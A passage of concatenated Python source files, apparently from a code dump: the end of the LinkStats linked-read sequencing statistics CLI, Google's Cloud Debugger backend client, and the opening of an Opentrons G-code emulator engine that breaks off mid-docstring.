coverage_data,
pd.DataFrame(
(
(
(
name,
genome_length,
bs.total_alignments,
bs.total_dup / bs.total_alignments,
bs.total_qcf / bs.total_alignments,
bs.total_unm / bs.total_alignments,
(bs.total_alignments - bs.total_unm)
/ bs.total_alignments,
bs.total_nobx / bs.total_alignments,
bs.total_nomi / bs.total_alignments,
bs.total_zeromq / bs.total_alignments,
)
+ n_stats(data["No. Reads"], (50, 90))
+ (
(data["No. Reads"] ** 2).sum()
/ data["No. Reads"].sum(),
)
+ tuple(
chain.from_iterable(
(
(
(
q.shape[0],
q.mean(),
d.mean(),
)
+ n_stats(
d,
(50, 90),
)
+ ((d ** 2).sum() / d.sum(),)
)
for m in min_reads
for s in (data[data["No. Reads"] >= m],)
for d in (s["Molecule Length"],)
for q in (s["Mean MapQ"],)
)
)
)
+ (
bs.median_insert_size,
bs.total_read_length / genome_length,
)
+ tuple(
chain.from_iterable(
(
(
s["Mean Read Depth"].mean(),
s["Molecule Length"].sum() / genome_length,
)
for m in min_reads
for s in (data[data["No. Reads"] >= m],)
)
)
)
)
for name in molecule_data["Sample Name"].unique()
for bs in (basic_stats[name],)
for data in (
molecule_data[molecule_data["Sample Name"] == name],
)
),
columns=(
"Sample Name",
"Genome Length",
"Total Alignments",
"Duplicates",
"QCFail",
"Unmapped",
"Mapped",
"No BX",
"No MI",
"Zero MapQ",
"N50 Reads Per Molecule",
"N90 Reads Per Molecule",
"auN Reads Per Molecule",
)
+ tuple(
chain.from_iterable(
(
(
f"No. Molecules (No. Reads >= {m})",
f"Mean Read MapQ Per Molecule (No. Reads >= {m})",
f"Mean Molecule Length (No. Reads >= {m})",
f"N50 Molecule Length (No. Reads >= {m})",
f"N90 Molecule Length (No. Reads >= {m})",
f"auN Molecule Length (No. Reads >= {m})",
)
for m in min_reads
)
)
)
+ ("Median Insert Size", "Mean Short Read Depth")
+ tuple(
chain.from_iterable(
(
(
f"Mean Short Read Depth Per Molecule (No. Reads >= {m})",
f"Molecule Read Depth (No. Reads >= {m})",
)
for m in min_reads
)
)
),
),
)
max_workers = max(min(threads, len(alignment_files)), 1)
with TPE(max_workers=max_workers) as exe:
return exe.map(
partial(GetStats, threads=max(threads // max_workers, 1)),
alignment_files,
)
def GetAllStatsFromCSVs(data, name, header):
files = tuple(mol.file for mol in data)
return (
iter(
tqdm_map(
partial(ReadCSV, header=header),
files,
max_workers=threads,
desc=f"Read CSVs ({name})",
unit=" CSV files",
unit_scale=True,
)
)
if len(files) > 0
else ()
)
summary_dfs = []
cov_dfs = []
def yield_all():
for df, cov_df, summ_df in GetAllStatsFromAFs():
summary_dfs.append(summ_df)
cov_dfs.append(cov_df)
yield df
yield from GetAllStatsFromCSVs(
molecular_data, "molecular data", MOL_DATA_HEADER
)
return (
ConcatDF(yield_all()),
ConcatDF(
chain(
cov_dfs,
GetAllStatsFromCSVs(coverage_data, "coverage data", COV_DATA_HEADER),
)
),
ConcatDF(summary_dfs),
)
def GetAllMolLenHists(df, hist_data, min_reads, threads):
def GetMolLenHist(args):
MAX_BINS = 1024
sample_name, min_reads = args
data = df[(df["Sample Name"] == sample_name) & (df["No. Reads"] >= min_reads)][
"Molecule Length"
]
prob, length = np.histogram(
data,
bins=np.interp(
np.linspace(
0,
len(data),
np.clip(
len(np.histogram_bin_edges(data, bins="auto")) - 1, 1, MAX_BINS
)
+ 1,
),
np.arange(len(data)),
np.sort(data),
),
density=True,
)
select = ~np.isnan(prob)
return pd.DataFrame(
{
"PDF": prob[select],
"CDF": np.cumsum(prob[select]) / prob[select].sum(),
"Molecule Length": ((length[:-1] + length[1:]) / 2)[select],
"Sample Name": sample_name,
"Min No. Reads": str(min_reads),
}
)
def yield_all():
if df.shape[0] > 0:
yield from iter(
tqdm_map(
GetMolLenHist,
tuple(
(name, n)
for name in df["Sample Name"].unique()
for n in min_reads
),
max_workers=threads,
desc="Generate Molecule Length Histogram Data",
unit=" Data-Sets",
unit_scale=True,
)
)
hist_files = tuple(hist.file for hist in hist_data)
yield from (
iter(
tqdm_map(
partial(ReadCSV, header=MOL_LEN_HIST_DATA_HEADER),
hist_files,
max_workers=threads,
desc="Read CSVs (molecule length histogram data)",
unit=" CSV files",
unit_scale=True,
)
)
if len(hist_files) > 0
else ()
)
return ConcatDF(yield_all())
def GetAllCovGapHists(df, hist_data, threads):
def GetMolLenHist(sample_name):
MAX_BINS = 1024
data = df[(df["Sample Name"] == sample_name)]["Gap Length"]
prob, length = np.histogram(
data,
bins=np.interp(
np.linspace(
0,
len(data),
np.clip(
len(np.histogram_bin_edges(data, bins="auto")) - 1, 1, MAX_BINS
)
+ 1,
),
np.arange(len(data)),
np.sort(data),
),
density=True,
)
select = ~np.isnan(prob)
return pd.DataFrame(
{
"PDF": prob[select],
"CDF": np.cumsum(prob[select]) / prob[select].sum(),
"Coverage Gap Length": ((length[:-1] + length[1:]) / 2)[select],
"Sample Name": sample_name,
}
)
def yield_all():
if df.shape[0] > 0:
yield from iter(
tqdm_map(
GetMolLenHist,
tuple(df["Sample Name"].unique()),
max_workers=threads,
desc="Generate Coverage Gap Histogram Data",
unit=" Data-Sets",
unit_scale=True,
)
)
hist_files = tuple(hist.file for hist in hist_data)
yield from (
iter(
tqdm_map(
partial(ReadCSV, header=COV_GAP_HIST_DATA_HEADER),
hist_files,
max_workers=threads,
desc="Read CSVs (coverage gap histogram data)",
unit=" CSV files",
unit_scale=True,
)
)
if len(hist_files) > 0
else ()
)
return ConcatDF(yield_all())
def documenter(docstring):
def inner_documenter(f):
f.__doc__ = docstring
return f
return inner_documenter
@ck.group(chain=True)
@ck.option(
"-t",
"--threads",
type=ck.IntRange(1, None, clamp=True),
default=4,
help="Number of threads to use. Default=4.",
)
@ck.option(
"-m",
"--min_reads",
type=ck.IntRange(1, None, clamp=True),
multiple=True,
default=(1, 3, 5, 10),
help="Minimum reads per molecule for analysis, multiple values possible. Default=(1, 3, 5, 10).",
)
@ck.version_option()
@documenter(
f"""
{NAME} {VERSION}
\b
{DESCRIPTION}
\b
{LICENCE}
\b
\b
Usage Example, read SAM/BAM/CRAM from <stdin> and save the summary and molecule data in csv format. Analyse molecules grouped by 5 and 10 minimum reads per molecule.
-------------
...<sam/bam/cram> | LinkStats -t 16 -m 5 -m 10 sam-data - save-csvs results/csvs/
\b
Usage Example, combine histogram data from multiple sources into summary plots.
-------------
LinkStats -t 16 hist-data results/dataset_1_molecular_length_histograms.csv.bz2 hist-data results/dataset_2_molecular_length_histograms.csv.bz2 hist-data results/dataset_3_molecular_length_histograms.csv.bz2 save-plots results/plots/
"""
)
def cli(threads, min_reads):
pass
@cli.command()
@ck.argument("path", type=ck.Path(readable=True, path_type=Path))
@ck.option(
"-r",
"--reference",
type=ck.Path(exists=True),
help="FASTA reference for CRAM decoding.",
)
@ck.option(
"-n", "--name", type=str, help="Sample name, overrides name from SM or RG tags."
)
@ck.option(
"--mi/--no-mi",
default=False,
help="Group by MI:I as well as BX:Z SAM tags. Default=False.",
)
@ck.option(
"-t",
"--threshold",
type=int,
default=50000,
help="Maximum allowed separation between alignments grouped to the same molecule.",
)
@documenter(
"""
Read SAM/BAM/CRAM data from PATH.
\b
Creates summary and molecular data-sets for each sample-name (SM:Z tag or RG:Z SAM tag).
\b
Alignments must have BX:Z (barcode) SAM tags.
"""
)
def sam_data(path, mi, threshold, reference=None, name=None):
return AlignmentFile(
file=path, ref=reference, name=name, use_mi_tags=mi, cluster_threshold=threshold
)
@cli.command()
@ck.argument("file", type=ck.Path(readable=True, path_type=Path))
@documenter(
"""
Read in molecular data from a CSV FILE.
\b
Use to re-calculate histogram data.
"""
)
def molecule_data(file):
return MoleculeData(file=file)
@cli.command()
@ck.argument("file", type=ck.Path(readable=True, path_type=Path))
@documenter(
"""
Read in coverage gap data from a CSV FILE.
\b
Use to re-calculate histogram data.
"""
)
def coverage_data(file):
return CoverageData(file=file)
@cli.command()
@ck.argument("file", type=ck.Path(readable=True, path_type=Path))
@documenter(
"""
Read in molecule length histogram data from a CSV FILE.
\b
Use to re-generate or create combined plots.
"""
)
def mol_len_hist_data(file):
return MolLenHistData(file=file)
@cli.command()
@ck.argument("file", type=ck.Path(readable=True, path_type=Path))
@documenter(
"""
Read in coverage gap histogram data from a CSV FILE.
\b
Use to re-generate or create combined plots.
"""
)
def cov_gap_hist_data(file):
return CovGapHistData(file=file)
@cli.command()
@ck.argument("prefix", type=ck.Path(readable=True, path_type=Path))
@ck.option(
"--summ/--no-summ", default=True, help="Save summary data table. Default=True."
)
@ck.option(
"--mol/--no-mol", default=False, help="Save molecule data table. Default=False."
)
@ck.option(
"--cov/--no-cov", default=False, help="Save coverage data table. Default=False."
)
@ck.option(
"--mol-hist/--no-mol-hist",
default=False,
help="Save molecular-length histogram data table. Default=False.",
)
@ck.option(
"--cov-hist/--no-cov-hist",
default=False,
help="Save coverage-gap histogram data table. Default=False.",
)
@documenter(
"""
Saves summary, molecule or histogram data to CSV files at PREFIX_.
\b
By default, only summary data is saved.
"""
)
def save_csvs(prefix, summ, mol, cov, mol_hist, cov_hist):
return CSVPrefix(
prefix,
save_summ=summ,
save_mol=mol,
save_cov=cov,
save_mol_hist=mol_hist,
save_cov_hist=cov_hist,
)
@cli.command()
@ck.argument("prefix", type=ck.Path(readable=True, path_type=Path))
@documenter(
"""
Generates plots from any histogram data and saves them at PREFIX_.
"""
)
def save_plots(prefix):
return PlotPrefix(prefix)
@cli.result_callback()
def run(callbacks, threads, min_reads):
def Error(msg):
LOGGER.error(msg)
sys.exit(1)
LOGGER.info("Starting...")
LOGGER.info("")
csv = tuple(cp for cp in callbacks if cp.is_CP)
if len(csv) == 0:
csv = None
else:
if len(csv) > 1:
warnings.warn(
f"More than one CSV prefix specified, using last one: {csv[-1].prefix}"
)
csv = csv[-1]
if csv and csv.save_summ and len(tuple(af for af in callbacks if af.is_AF)) == 0:
warnings.warn("No SAM data input, cannot output summary data")
csv.save_summ = False
if csv and not csv.any_set:
Error("CSV prefix specified, but no data set to be saved")
plot = tuple(pp.prefix for pp in callbacks if pp.is_PP)
if len(plot) == 0:
plot = None
else:
if len(plot) > 1:
warnings.warn(
f"More than one Plot prefix specified, using last one: {plot[-1]}"
)
plot = plot[-1]
if not (csv or plot):
Error("Neither CSV nor Plot prefix specified, nothing to do")
mol_data, cov_data, summary_data = GetAllStats(
(af for af in callbacks if af.is_AF),
(md for md in callbacks if md.is_MD),
(cd for cd in callbacks if cd.is_CD),
min_reads,
threads,
)
if summary_data.shape[0] > 0:
LOGGER.info("")
for line in str(summary_data).split("\n"):
LOGGER.info(line)
LOGGER.info("")
mol_hist_data = (
GetAllMolLenHists(
mol_data, (hd for hd in callbacks if hd.is_MLHD), min_reads, threads
)
if ((csv and csv.save_mol_hist) or plot)
else None
)
cov_hist_data = (
GetAllCovGapHists(cov_data, (hd for hd in callbacks if hd.is_CGHD), threads)
if ((csv and csv.save_cov_hist) or plot)
else None
)
def base_get_path(f, prefix):
return prefix / f if prefix.is_dir() else Path(str(prefix) + "_" + f)
generated = []
if csv:
csv.prefix.parent.mkdir(parents=True, exist_ok=True)
get_path = partial(base_get_path, prefix=csv.prefix)
def save_csv(args):
df, name = args
name = get_path(name)
df.to_csv(name, index=False)
return name
generated.append(
iter(
tqdm_map(
save_csv,
(
(
((summary_data, "summary_data.csv"),)
if (csv.save_summ and summary_data.shape[0] > 0)
else ()
)
+ (
((mol_data, "molecular_data.csv.bz2"),)
if csv.save_mol
else ()
)
+ (
((cov_data, "coverage_data.csv.bz2"),)
if csv.save_cov
else ()
)
+ (
((mol_hist_data, "molecular_length_histograms.csv.bz2"),)
if csv.save_mol_hist
else ()
)
+ (
((cov_hist_data, "coverage_gap_histograms.csv.bz2"),)
if csv.save_cov_hist
else ()
)
),
max_workers=threads,
desc="Saving CSV data",
unit=" Data-Sets",
)
)
)
if plot:
plot.parent.mkdir(parents=True, exist_ok=True)
get_path = partial(base_get_path, prefix=plot)
if mol_hist_data.shape[0] > 0:
def save_mol_plots(col, hue, n, typ):
name = get_path(f"molecular_length_{typ}s_{n}.png")
sb.relplot(
kind="line",
data=mol_hist_data,
col=col,
hue=hue,
x="Molecule Length",
y=typ,
).set(
xscale="log", yscale=("log" if typ == "PDF" else "linear")
).savefig(
name,
dpi=200,
bbox_inches="tight",
)
return name
generated.append(
(
save_mol_plots(col, hue, i + 1, typ)
for i, col, hue, typ in tqdm(
tuple(
(i, col, hue, typ)
for i, (col, hue) in enumerate(
(col, hue)
for colhue in (("Sample Name", "Min No. Reads"),)
for col, hue in (colhue, colhue[::-1])
)
for typ in ("PDF", "CDF")
),
desc="Saving Molecular Length Plots",
unit=" Plots",
)
)
)
if cov_hist_data.shape[0] > 0:
def save_cov_plots(typ):
name = get_path(f"coverage_gap_{typ}s.png")
sb.relplot(
kind="line",
data=cov_hist_data,
hue="Sample Name",
x="Coverage Gap Length",
y=typ,
).set(
xscale="log", yscale=("log" if typ == "PDF" else "linear")
).savefig(
name,
dpi=200,
bbox_inches="tight",
)
return name
generated.append(
(
save_cov_plots(typ)
for typ in tqdm(
("PDF", "CDF"),
desc="Saving Coverage Gap Plots",
unit=" Plots",
)
)
)
generated = tuple(("\t" + str(n)) for n in chain.from_iterable(generated))
LOGGER.info("")
LOGGER.info("Generated files:")
for line in generated:
LOGGER.info(line)
LOGGER.info("")
LOGGER.info("Done")
|
gcp_hub_client.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Communicates with Cloud Debugger backend over HTTP."""
from collections import deque
import copy
import hashlib
import inspect
import json
import logging
import os
import platform
import socket
import sys
import threading
import time
import traceback
import apiclient
import apiclient.discovery
import google_auth_httplib2
import httplib2
import six
import google.auth
from google.oauth2 import service_account
from . import backoff
from . import cdbg_native as native
from . import labels
from . import uniquifier_computer
from . import version
# This module catches all exception. This is safe because it runs in
# a daemon thread (so we are not blocking Ctrl+C). We need to catch all
# the exception because HTTP client is unpredictable as far as every
# exception it can throw.
# pylint: disable=broad-except
# API scope we are requesting when service account authentication is enabled.
_CLOUD_PLATFORM_SCOPE = ['https://www.googleapis.com/auth/cloud-platform']
# Set of all known debuggee labels (passed down as flags). The value of
# a map is optional environment variable that can be used to set the flag
# (flags still take precedence).
_DEBUGGEE_LABELS = {
labels.Debuggee.MODULE: ['GAE_SERVICE', 'GAE_MODULE_NAME', 'K_SERVICE'],
labels.Debuggee.VERSION: [
'GAE_VERSION', 'GAE_MODULE_VERSION', 'K_REVISION'
],
labels.Debuggee.MINOR_VERSION: ['GAE_DEPLOYMENT_ID', 'GAE_MINOR_VERSION']
}
# Debuggee labels used to format debuggee description (ordered). The minor
# version is excluded for the sake of consistency with AppEngine UX.
_DESCRIPTION_LABELS = [
labels.Debuggee.PROJECT_ID, labels.Debuggee.MODULE, labels.Debuggee.VERSION
]
# HTTP timeout when accessing the cloud debugger API. It is selected to be
# longer than the typical controller.breakpoints.list hanging get latency
# of 40 seconds.
_HTTP_TIMEOUT_SECONDS = 100
class NoProjectIdError(Exception):
"""Used to indicate the project id cannot be determined."""
class GcpHubClient(object):
"""Controller API client.
Registers the debuggee, queries the active breakpoints and sends breakpoint
updates to the backend.
This class supports two types of authentication: application default
credentials or a manually provided JSON credentials file for a service
account.
GcpHubClient creates a worker thread that communicates with the backend. The
thread can be stopped with a Stop function, but it is optional since the
worker thread is marked as daemon.
"""
def __init__(self):
self.on_active_breakpoints_changed = lambda x: None
self.on_idle = lambda: None
self._debuggee_labels = {}
self._service_account_auth = False
self._debuggee_id = None
self._wait_token = 'init'
self._breakpoints = []
self._main_thread = None
self._transmission_thread = None
self._transmission_thread_startup_lock = threading.Lock()
self._transmission_queue = deque(maxlen=100)
self._new_updates = threading.Event()
# Disable logging in the discovery API to avoid excessive logging.
class _ChildLogFilter(logging.Filter):
"""Filter to eliminate info-level logging when called from this module."""
def __init__(self, filter_levels=None):
super(_ChildLogFilter, self).__init__()
self._filter_levels = filter_levels or set(logging.INFO)
# Get name without extension to avoid .py vs .pyc issues
self._my_filename = os.path.splitext(
inspect.getmodule(_ChildLogFilter).__file__)[0]
def filter(self, record):
if record.levelno not in self._filter_levels:
return True
callerframes = inspect.getouterframes(inspect.currentframe())
for f in callerframes:
if os.path.splitext(f[1])[0] == self._my_filename:
return False
return True
self._log_filter = _ChildLogFilter({logging.INFO})
apiclient.discovery.logger.addFilter(self._log_filter)
#
# Configuration options (constants only modified by unit test)
#
# Delay before retrying failed request.
self.register_backoff = backoff.Backoff() # Register debuggee.
self.list_backoff = backoff.Backoff() # Query active breakpoints.
self.update_backoff = backoff.Backoff() # Update breakpoint.
# Maximum number of times that the message is re-transmitted before it
# is assumed to be poisonous and discarded
self.max_transmit_attempts = 10
def InitializeDebuggeeLabels(self, flags):
"""Initialize debuggee labels from environment variables and flags.
The caller passes all the flags that the debuglet got. This function
will only use the flags used to label the debuggee. Flags take precedence
over environment variables.
Debuggee description is formatted from available flags.
Args:
flags: dictionary of debuglet command line flags.
"""
self._debuggee_labels = {}
for (label, var_names) in six.iteritems(_DEBUGGEE_LABELS):
# var_names is a list of possible environment variables that may contain
# the label value. Find the first one that is set.
for name in var_names:
value = os.environ.get(name)
if value:
# Special case for module. We omit the "default" module
# to stay consistent with AppEngine.
if label == labels.Debuggee.MODULE and value == 'default':
break
self._debuggee_labels[label] = value
break
if flags:
self._debuggee_labels.update(
{name: value for (name, value) in six.iteritems(flags)
if name in _DEBUGGEE_LABELS})
self._debuggee_labels['projectid'] = self._project_id
def SetupAuth(self,
project_id=None,
project_number=None,
service_account_json_file=None):
"""Sets up authentication with Google APIs.
This will use the credentials from service_account_json_file if provided,
falling back to application default credentials.
See https://cloud.google.com/docs/authentication/production.
Args:
project_id: GCP project ID (e.g. myproject). If not provided, will attempt
to retrieve it from the credentials.
project_number: GCP project number (e.g. 72386324623). If not provided,
project_id will be used in its place.
service_account_json_file: JSON file to use for credentials. If not
provided, will default to application default credentials.
Raises:
NoProjectIdError: If the project id cannot be determined.
"""
if service_account_json_file:
self._credentials = (
service_account.Credentials.from_service_account_file(
service_account_json_file, scopes=_CLOUD_PLATFORM_SCOPE))
if not project_id:
with open(service_account_json_file) as f:
project_id = json.load(f).get('project_id')
else:
self._credentials, credentials_project_id = google.auth.default(
scopes=_CLOUD_PLATFORM_SCOPE)
project_id = project_id or credentials_project_id
if not project_id:
raise NoProjectIdError(
'Unable to determine the project id from the API credentials. '
'Please specify the project id using the --project_id flag.')
self._project_id = project_id
self._project_number = project_number or project_id
def Start(self):
"""Starts the worker thread."""
self._shutdown = False
self._main_thread = threading.Thread(target=self._MainThreadProc)
self._main_thread.name = 'Cloud Debugger main worker thread'
self._main_thread.daemon = True
self._main_thread.start()
def Stop(self):
"""Signals the worker threads to shut down and waits until it exits."""
self._shutdown = True
self._new_updates.set() # Wake up the transmission thread.
if self._main_thread is not None:
self._main_thread.join()
self._main_thread = None
if self._transmission_thread is not None:
self._transmission_thread.join()
self._transmission_thread = None
def EnqueueBreakpointUpdate(self, breakpoint):
"""Asynchronously updates the specified breakpoint on the backend.
This function returns immediately. The worker thread is actually doing
all the work. The worker thread is responsible to retry the transmission
in case of transient errors.
Args:
breakpoint: breakpoint in either final or non-final state.
"""
with self._transmission_thread_startup_lock:
if self._transmission_thread is None:
self._transmission_thread = threading.Thread(
target=self._TransmissionThreadProc)
self._transmission_thread.name = 'Cloud Debugger transmission thread'
self._transmission_thread.daemon = True
self._transmission_thread.start()
self._transmission_queue.append((breakpoint, 0))
self._new_updates.set() # Wake up the worker thread to send immediately.
def _BuildService(self):
http = httplib2.Http(timeout=_HTTP_TIMEOUT_SECONDS)
http = google_auth_httplib2.AuthorizedHttp(self._credentials, http)
api = apiclient.discovery.build(
'clouddebugger', 'v2', http=http, cache_discovery=False)
return api.controller()
def _MainThreadProc(self):
"""Entry point for the worker thread."""
registration_required = True
while not self._shutdown:
if registration_required:
service = self._BuildService()
registration_required, delay = self._RegisterDebuggee(service)
if not registration_required:
registration_required, delay = self._ListActiveBreakpoints(service)
if self.on_idle is not None:
self.on_idle()
if not self._shutdown:
time.sleep(delay)
def _TransmissionThreadProc(self):
"""Entry point for the transmission worker thread."""
reconnect = True
while not self._shutdown:
self._new_updates.clear()
if reconnect:
service = self._BuildService()
reconnect = False
reconnect, delay = self._TransmitBreakpointUpdates(service)
self._new_updates.wait(delay)
def _RegisterDebuggee(self, service):
"""Single attempt to register the debuggee.
If the registration succeeds, sets self._debuggee_id to the registered
debuggee ID.
Args:
service: client to use for API calls
Returns:
(registration_required, delay) tuple
"""
try:
request = {'debuggee': self._GetDebuggee()}
try:
response = service.debuggees().register(body=request).execute()
# self._project_number will refer to the project id on initialization if
# the project number is not available. The project field in the debuggee
# will always refer to the project number. Update so the server will not
# have to do id->number translations in the future.
project_number = response['debuggee'].get('project')
self._project_number = project_number or self._project_number
self._debuggee_id = response['debuggee']['id']
native.LogInfo('Debuggee registered successfully, ID: %s' % (
self._debuggee_id))
self.register_backoff.Succeeded()
return (False, 0) # Proceed immediately to list active breakpoints.
except BaseException:
native.LogInfo('Failed to register debuggee: %s, %s' %
(request, traceback.format_exc()))
except BaseException:
native.LogWarning('Debuggee information not available: ' +
traceback.format_exc())
return (True, self.register_backoff.Failed())
def _ListActiveBreakpoints(self, service):
"""Single attempt query the list of active breakpoints.
Must not be called before the debuggee has been registered. If the request
fails, this function resets self._debuggee_id, which triggers repeated
debuggee registration.
Args:
service: client to use for API calls
Returns:
(registration_required, delay) tuple
"""
try:
response = service.debuggees().breakpoints().list(
debuggeeId=self._debuggee_id, waitToken=self._wait_token,
successOnTimeout=True).execute()
if not response.get('waitExpired'):
self._wait_token = response.get('nextWaitToken')
breakpoints = response.get('breakpoints') or []
if self._breakpoints != breakpoints:
self._breakpoints = breakpoints
native.LogInfo(
'Breakpoints list changed, %d active, wait token: %s' % (
len(self._breakpoints), self._wait_token))
self.on_active_breakpoints_changed(copy.deepcopy(self._breakpoints))
except BaseException:
native.LogInfo('Failed to query active breakpoints: ' +
traceback.format_exc())
# Forget debuggee ID to trigger repeated debuggee registration. Once the
# registration succeeds, the worker thread will retry this query
self._debuggee_id = None
return (True, self.list_backoff.Failed())
self.list_backoff.Succeeded()
return (False, 0)
def _TransmitBreakpointUpdates(self, service):
"""Tries to send pending breakpoint updates to the backend.
Sends all the pending breakpoint updates. In case of transient failures,
the breakpoint is inserted back to the top of the queue. Application
failures are not retried (for example updating breakpoint in a final
state).
Each pending breakpoint maintains a retry counter. After repeated transient
failures the breakpoint is discarded and dropped from the queue.
Args:
service: client to use for API calls
Returns:
(reconnect, timeout) tuple. The first element ("reconnect") is set to
true on unexpected HTTP responses. The caller should discard the HTTP
connection and create a new one. The second element ("timeout") is
set to None if all pending breakpoints were sent successfully. Otherwise
returns time interval in seconds to stall before retrying.
"""
reconnect = False
retry_list = []
# There is only one consumer, so two step pop is safe.
while self._transmission_queue:
breakpoint, retry_count = self._transmission_queue.popleft()
try:
service.debuggees().breakpoints().update(
debuggeeId=self._debuggee_id, id=breakpoint['id'],
body={'breakpoint': breakpoint}).execute()
native.LogInfo('Breakpoint %s update transmitted successfully' % (
breakpoint['id']))
except apiclient.errors.HttpError as err:
# Treat 400 error codes (except timeout) as application error that will
# not be retried. All other errors are assumed to be transient.
status = err.resp.status
is_transient = ((status >= 500) or (status == 408))
if is_transient:
if retry_count < self.max_transmit_attempts - 1:
native.LogInfo('Failed to send breakpoint %s update: %s' %
(breakpoint['id'], traceback.format_exc()))
retry_list.append((breakpoint, retry_count + 1))
else:
native.LogWarning('Breakpoint %s retry count exceeded maximum' %
breakpoint['id'])
else:
# This is very common if multiple instances are sending final update
# simultaneously.
native.LogInfo('%s, breakpoint: %s' % (err, breakpoint['id']))
except socket.error as err:
if retry_count < self.max_transmit_attempts - 1:
native.LogInfo(
'Socket error %d while sending breakpoint %s update: %s' %
(err.errno, breakpoint['id'], traceback.format_exc()))
retry_list.append((breakpoint, retry_count + 1))
else:
native.LogWarning('Breakpoint %s retry count exceeded maximum' %
breakpoint['id'])
# Socket errors shouldn't persist like this; reconnect.
reconnect = True
except BaseException:
native.LogWarning(
'Fatal error sending breakpoint %s update: %s' % (
breakpoint['id'], traceback.format_exc()))
reconnect = True
self._transmission_queue.extend(retry_list)
if not self._transmission_queue:
self.update_backoff.Succeeded()
# Nothing to send, wait until next breakpoint update.
return (reconnect, None)
else:
return (reconnect, self.update_backoff.Failed())
def _GetDebuggee(self):
"""Builds the debuggee structure."""
major_version = 'v' + version.__version__.split('.')[0]
python_version = ''.join(platform.python_version().split('.')[:2])
agent_version = ('google.com/python%s-gcp/%s' % (python_version,
major_version))
debuggee = {
'project': self._project_number,
'description': self._GetDebuggeeDescription(),
'labels': self._debuggee_labels,
'agentVersion': agent_version,
}
source_context = self._ReadAppJsonFile('source-context.json')
if source_context:
debuggee['sourceContexts'] = [source_context]
debuggee['uniquifier'] = self._ComputeUniquifier(debuggee)
return debuggee
def _GetDebuggeeDescription(self):
"""Formats debuggee description based on debuggee labels."""
return '-'.join(self._debuggee_labels[label]
for label in _DESCRIPTION_LABELS
if label in self._debuggee_labels)
def _ComputeUniquifier(self, debuggee):
"""Computes debuggee uniquifier.
The debuggee uniquifier has to be identical on all instances. Therefore the
uniquifier should not include any random numbers and should only be based
on inputs that are guaranteed to be the same on all instances.
Args:
debuggee: complete debuggee message without the uniquifier
Returns:
Hex string of SHA1 hash of project information, debuggee labels and
debuglet version.
"""
uniquifier = hashlib.sha1()
# Compute hash of application files if we don't have source context. This
# way we can still distinguish between different deployments.
if ('minorversion' not in debuggee.get('labels', []) and
'sourceContexts' not in debuggee):
uniquifier_computer.ComputeApplicationUniquifier(uniquifier)
return uniquifier.hexdigest()
def _ReadAppJsonFile(self, relative_path):
"""Reads JSON file from an application directory.
Args:
relative_path: file name relative to application root directory.
Returns:
Parsed JSON data or None if the file does not exist, can't be read or
not a valid JSON file.
"""
try:
with open(os.path.join(sys.path[0], relative_path), 'r') as f:
return json.load(f)
except (IOError, ValueError):
return None
|
g_code_engine.py
|
import os
import sys
import asyncio
import time
from multiprocessing import Process
from typing import Generator, Callable, Iterator
from collections import namedtuple
from opentrons.hardware_control.emulation.settings import Settings
from opentrons.hardware_control.emulation.types import ModuleType
from opentrons.protocols.parse import parse
from opentrons.protocols.execution import execute
from contextlib import contextmanager
from opentrons.protocol_api import ProtocolContext
from opentrons.config.robot_configs import build_config
from opentrons.hardware_control.emulation.module_server.helpers import (
wait_emulators,
ModuleStatusClient,
)
from opentrons.hardware_control.emulation.scripts import run_app
from opentrons.hardware_control import API, ThreadManager
from g_code_parsing.g_code_program.g_code_program import (
GCodeProgram,
)
from g_code_parsing.g_code_watcher import GCodeWatcher
from opentrons.protocols.context.protocol_api.protocol_context import (
ProtocolContextImplementation,
)
from g_code_parsing.utils import get_configuration_dir
Protocol = namedtuple("Protocol", ["text", "filename", "filelike"])
class GCodeEngine:
"""
Class for running a thing against the emulator.
See src/opentrons/hardware_control/emulation/settings.py for example explanation
of Smoothie configs
Add new run_* methods to class to support different inputs to the engine
Workflow is as follows:
1. Instantiate GCodeEngine
2. Call run_* method
3. Gather parsed data from returned GCodeProgram
"""
URI_TEMPLATE = "socket://127.0.0.1:%s"
def __init__(self, emulator_settings: Settings) -> None:
self._config = emulator_settings
@staticmethod
def _get_loop() -> asyncio.AbstractEventLoop:
"""Create an event loop"""
if sys.platform == "win32":
_loop = asyncio.ProactorEventLoop()
else:
_loop = asyncio.new_event_loop()
asyncio.set_event_loop(_loop)
return asyncio.get_event_loop()
@contextmanager
def _emulate(self) -> Iterator[ThreadManager]:
"""Context manager that starts emulated OT-2 hardware environment. A
hardware controller is returned."""
modules = [ModuleType.Magnetic, ModuleType.Temperature, ModuleType.Thermocycler]
# Entry point for the emulator app process
def _run_app():
asyncio.run(run_app.run(self._config, modules=[m.value for m in modules]))
proc = Process(target=_run_app)
proc.daemon = True
proc.start()
# Entry point for process that waits for emulation to be ready.
async def _wait_ready() -> None:
c = await ModuleStatusClient.connect(
host="localhost", port=self._config.module_server.port
)
await wait_emulators(client=c, modules=modules, timeout=5)
c.close()
def _run_wait_ready():
asyncio.run(_wait_ready())
ready_proc = Process(target=_run_wait_ready)
ready_proc.daemon = True
ready_proc.start()
ready_proc.join()
# Hardware controller
conf = build_config({})
emulator = ThreadManager(
API.build_hardware_controller,
conf,
GCodeEngine.URI_TEMPLATE % self._config.smoothie.port,
)
# Wait for modules to be present
while len(emulator.attached_modules) != len(modules):
time.sleep(0.1)
yield emulator
# Finished. Stop the emulator
proc.kill()
proc.join()
@staticmethod
def _get_protocol(file_path: str) -> Protocol:
with open(file_path) as file:
text = "".join(list(file))
file.seek(0)
return Protocol(text=text, filename=file_path, filelike=file)
@contextmanager
def run_protocol(self, path: str) -> Generator:
"""
Runs passed protocol file and collects all G-Code I/O from it.
Will cleanup emulation after execution
:param path: Path to file
:return: GCodeProgram with all the parsed data
"""
file_path = os.path.join(get_configuration_dir(), path)
with self._emulate() as h:
protocol = self._get_protocol(file_path)
context = ProtocolContext(
implementation=ProtocolContextImplementation(hardware=h),
loop=self._get_loop(),
)
parsed_protocol = parse(protocol.text, protocol.filename)
with GCodeWatcher(emulator_settings=self._config) as watcher:
execute.run_protocol(parsed_protocol, context=context)
yield GCodeProgram.from_g_code_watcher(watcher)
@contextmanager
def run_http(self, executable: Callable):
"""
